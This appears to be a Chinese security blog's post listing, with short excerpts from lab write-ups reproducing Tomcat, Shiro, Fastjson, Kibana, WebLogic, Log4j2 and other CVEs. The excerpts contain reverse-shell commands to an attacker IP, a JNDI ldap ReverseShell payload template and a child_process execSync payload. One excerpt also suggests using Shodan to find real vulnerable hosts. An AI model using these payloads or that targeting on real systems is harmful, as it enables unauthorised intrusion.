- 博客(21)
- 收藏
- 关注
原创 Apache Tomcat 远程代码执行漏洞(CVE-2025-24813)
在文件上传未完成的情况下,内容会被临时存储在Tomcat的工作目录:$CATALINA_BASE/work/Catalina/localhost/ROOT。利用需要反序列化链,下载commons-collections-3.2.1,并将commons-collections-3.2.1.jar文件复制到\apache-tomcat-9.0.98\lib目录下。1、Tomcat的File会话存储默认路径同样位于:CATALINA_BASE/work/Catalina/localhost/ROOT。
2025-03-16 23:48:28
971
原创 Apache Tomcat 远程代码执行漏洞(CVE-2024-50379)
如果对不区分大小写的文件系统(如Windоԝѕ)启用了默认 ѕеrvlеt 的写入功能(将rеаdоnlу 初始化参数设置为非默认值 fаlѕе),则在同时读取和上传同一个文件可以绕过 Tоmсаt 的大小写敏感检查,并导致上传的文件被视为 jsp,从而导致远程代码执行。在Tomcat对文件进行处理安全检查这些操作时,期间存在时间差,当攻击者不断的发送PUT请求不合标准的.Jsp文件和不断的GET该文件,导致了条件竞争,不区分大小写的文件系统在PUT进去的瞬间就被GET编译执行,从而绕过了安全检查。
2025-03-16 23:39:00
383
原创 pikachu靶场通关笔记
暴力破解”是一种攻击手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。为了提高效率,暴力破解一般会使用带有字典的工具来进行自动化操作。XSS漏洞,全称跨站脚本(Cross Site Scripting),攻击者利用此漏洞可向web页面(如input表单、URL、留言板等位置)插入恶意JavaScript代码。当管理员或用户访问这些页面时,恶意脚本会触发并执行,从而达到攻击者的目的。
2025-03-16 23:37:26
1044
原创 Apache Shiro 身份验证绕过漏洞 (CVE-2020-1957)
这里对该漏洞进行简要总结,发送的URL请求进入shiro权限检验再进入spring中处理,漏洞就出现在发送的URL和shiro检验的URL以及spring处理后的URL都不相同。当Shiro与Spring结合使用时,由于两者对URL的解析规则不一致(例如处理/path/与/path、路径变量或特殊字符),攻击者可构造特定请求绕过权限校验。/admin/,返回URL:/admin/2、shiro处理后以 **;由于处理后的URL并不会匹配到/admin/**,所以shiro权限验证就通过了。
2025-03-09 22:36:45
361
原创 Apache Shiro721 反序列化漏洞(CVE-2019-12422)
Shiro550和Shiro721的区别在于,Shiro550的AES密钥是硬编码固定的,攻击者可以利用该密钥进行恶意数据伪造生成一个cookie的rememberMe值,服务器在使用相同的密钥进行解密导致恶意构造数据得以执行。而Shiro721的ASE密钥是系统随机生成的,需要通过登录成功后得到rememberMe值,将rememberMe值作为前缀和命令执行的payload进行爆破,生成正确的rememberMe cookie实现payload的执行。使用的工具在github上都有。
2025-03-09 02:22:58
450
原创 Apache Shiro550 1.2.4反序列化漏洞(CVE-2016-4437)
在处理cookie时,Shiro会遵循以下流程:获取rememberMe的cookie值,进行Base64解码,使用AES解密,然后进行反序列化。然而,在Shiro版本1.2.4及更早的版本中,AES的密钥是硬编码(固定)的,即密钥是固定且写在代码中的。在使用加密脚本进行伪造cookie,脚本里的popen参数中改成你的ysoserial名称,运行报No module named Crypto.Cipher就需要安装pycryptodome库,存在rememberMe=deleteMe字段,尝试利用。
2025-03-09 02:21:55
659
原创 Fastjson 1.2.47反序列化远程代码执行(CNVD-2019-22238)
如果这些特定方法中存在可被恶意利用的逻辑(通常被称为“Gadget”),那么攻击者就可能利用这些逻辑执行恶意代码,从而导致严重的安全问题。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。“dataSourceName”: “ldap://{JNDIExploit启动ldap服务的IP}:1389/Basic/ReverseShell/{开启nc服务的ip}/{nc端口}”,
2025-02-28 03:19:59
546
原创 Node.js_Kibana 本地文件包含 CVE-2018-17246
在靶场的docker容器中创建JS文件并写入内容,echo ‘export default {asJson: function() {return require(“child_process”).execSync(“id”).toString()}}’ > /tmp/vulhub.js。虽然响应包返回500状态的错误消息,但是在搭建靶场使用docker-compose logs查看当前靶场日志时可以看到,日志中执行了,证明/etc/passwd被包含成功了。
2025-02-27 06:44:57
985
原创 Fastjson 1.2.24反序列化远程代码执行(CNVD-2017-02833)
由于Fastison 提供了反序列化功能,允许用户在输入JSON 串时通过“@type” 键对应的 value 指定任意反序列化类名,在数据专输时会默认调用该对象的setter getter方法,利用JdbcRowSetlmpl类,该类在setAutoCommit函数中会对成员变量dataSourceName进行lookup,导致JNDI注入的产生。然后开启NC监听自己反弹shell中的IP和端口,然后将JNDI工具生成的payload插入我们请求的数据包中。使用vulhub搭建靶场环境。
2025-02-27 02:59:42
278
原创 Node.js_systeminformation命令执行CVE-2021-21315
Node.JS 的系统信息库(npm 包“systeminformation”)是一个开源函数集合,用于检索详细的硬件、系统和操作系统信息。在5.3.1版本之前的systeminformation中存在命令注入漏洞。作为解决方法而不是升级,请务必检查或清理传递给 si.inetLatency()、si.inetChecksite()、si.services()、si.processLoad() …的服务参数,仅允许字符串,拒绝任何数组。/目标IP/api/getServices?POC为:http:/
2025-02-26 03:13:54
326
原创 Node.js_mongo-express 代码执行CVE-2019-10758
0.54.0 之前的 mongo-express 容易通过使用“toBSON”方法的端点进行远程代码执行。VPS上创建shell脚本:echo “bash -i >& /dev/tcp/192.168.1.1/7410 0>&1” > shell.sh。尝试直接反弹shell,“bash -i >& /dev/tcp/192.168.1.1/7410 0>&1”发现不行,在自己的VPS上创建shell脚本文件,远程控制下载到本地运行。-O /tmp/shell.sh”),IP改为VPS的。
2025-02-26 03:12:05
281
原创 Node.js_Kibana原型污染导致远程代码执行CVE-2019-7609
5.6.15 和 6.6.1 之前的 Kibana 版本在 Timelion 可视化器中包含任意代码执行缺陷。有权访问 Timelion 应用程序的攻击者可以发送尝试执行 JavaScript 代码的请求。这可能会导致攻击者使用主机系统上 Kibana 进程的权限执行任意命令。如果是在线搭建的靶场反弹shell 的IP设置自己VPS上使用NC监听的,本地搭建的靶场改自己本地攻击机NC监听的。点击菜单栏中的Timelion功能,将反弹shell的payload填入并运行。Kibana基于node.js实现。
2025-02-26 03:10:34
276
原创 Node.js_node-serialize反序列化代码执行CVE-2017-5941
0.0.4 中发现了一个问题。通过传递带有立即调用函数表达式 (IIFE) 的 JavaScript 对象,可以利用传递到 unserialize() 函数的不受信任数据来实现任意代码执行。在自己服务器上用NC监听payload的端口,提交后反弹成功后便可以执行命令。0.0.4 进行反序列化的node.js应用程序。用户随便输入,在密码处填写payload。在 Node.js 的节点序列化包。使用vulfocus启动靶场环境。使用node-serialize。IP和端口改成自己的。
2025-02-26 03:08:55
204
原创 Node.js _Express目录穿越漏洞(CVE-2017-14849)
的BUG可以影响的绝非仅有express,更有待深入挖掘。不过因为这个BUG是node 8.5.0 中引入的,在 8.6 中就进行了修复,所以影响范围有限。在返回包中X-Powered-By: Express,Express是基于Node.js的开发框架。express这类web框架,通常会提供了静态文件服务器的功能,这些功能依赖于。比如,express在判断path是否超出静态目录范围时,就用到了。函数返回错误结果导致绕过了检查,造成任意文件读取漏洞。操作时出现了逻辑错误,导致向上层跳跃的时候(如。
2025-02-26 02:56:25
356
原创 Weblogic 10.3.6 弱口令&任意文件读取
在本次环境中基于当前目录/root/Oracle/Middleware/user_projects/domains/base_domain,所以路径为config/config.xml和security/SerializedSystemIni.dat。密钥存储路径:/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat。path=/etc/passwd读取下载passwd文件。
2025-02-26 02:51:39
539
原创 Weblogic SSRF(CVE-2014-4210)
这种攻击方式通常针对从外网无法访问的内部系统,因为是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统。然而,需要注意的是,DICT协议不支持换行符,无法进行换行,因此不适合用于攻击那些需要交互的应用(如需要认证的Redis)。SSRF漏洞通过篡改获取资源的请求发送给服务器(服务器并没有检测这个请求是否合法的),然后服务器以他的身份来访问服务器的其他资源。开放的端口和非开放的端口在响应时间上是不同的,因此攻击者可以通过FTP协议来收集这些信息。这里为了方便直接查看靶场的redis的IP和端口。
2025-02-26 02:50:13
882
原创 Apache Kafka Clients JNDI 注入 RCE (CVE-2023-25194)
在Apache Kafka Connect中存在JNDI注入漏洞,当攻击者可访问Kafka Connect Worker,且可以创建或修改连接器时,通过设置sasl.jaas.config属性为com.sun.security.auth.module.JndiLoginModule,进而可导致JNDI注入,造成RCE需低版本JDK或目标Kafka Connect系统中存在利用链。验证漏洞存在,开启我们的恶意JNDI服务器,将地址改为指向攻击者服务器的payload,达到反弹shell。
2025-02-22 03:26:06
171
原创 Joomla 权限绕过 (CVE-2023-23752)
中发现问题 4.0.0 到 4.2.7。由于属性覆盖问题攻击者恶意的请求会导致对 Web 服务端点进行未经授权的访问。接口测试就不一一演示了,感兴趣可以通过burp的爆破等方式进行测试。不想下载也可以通过查看页面源代码的方式进行获取,右键当前页面。正常在url后直接添加入构造的路径,发现提示有文件下载。使用burp抓包,然后ctrl+r发送到重发器进行操作。打开下载的文件发现里面存在配置信息,用户密码等。在url添加入构造的poc,获取信息。构造恶意请求路径,属性覆盖。
2025-02-22 03:14:37
814
原创 心脏滴血OpenSSL Heartbleed Vulnerability (CVE-2014-0160)
心脏出血是OpenSSL1.0.1版本至OpenSSL1.0.1f Beta1版本中存在漏洞,该漏洞中文名称为心脏滴血,英文名称为HeartBleed。即HeartBleed是在心跳协议上的一个数据泄露漏洞,OpenSSL库中用到了该心跳协议。利用该漏洞,攻击者可以远程读取服务器内存中64K的数据,获取内存中的敏感信息。通过shodan搜索漏洞关键版本OpenSSL/1.0.1a查找相关存在漏洞目标,利用方式和以上靶场一样,设置目标参数然后开始攻击获取信息即可。启动msf,对漏洞模块进行搜索利用。
2025-02-22 03:08:20
188
原创 Weblogic 未授权远程代码执行 (CVE-2023-21839)
由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。ldap://{JNDIExploit启动ldap服务的IP}:1389/Basic/ReverseShell/{开启nc服务的ip}/{nc端口}证明漏洞存在,解压并使用中转工具开启监听,进而反弹shell。
2025-02-22 03:01:13
443
原创 Apache Log4j2 lookup功能 JNDI 注入RCE (CVE-2021-44228)
攻击者可向目标服务器发送精心构造的恶意数据,触发 Log4j2 组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。在支持的prefix中只有jndi能够进行注入,所以当日志消息中存在时,会调用JndiLookup的lookup方法处理ldap://x.x.x.x/exp,从而使用ldap加载远程服务器上的恶意class,造成jndi注入。漏洞利用,构造payload通过jndi注入工具开启ldap、rmi服务,从而达到让目标主机请求我们攻击者的服务,实现反弹shell。对靶场进行漏洞验证,
2025-02-22 02:49:58
391
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人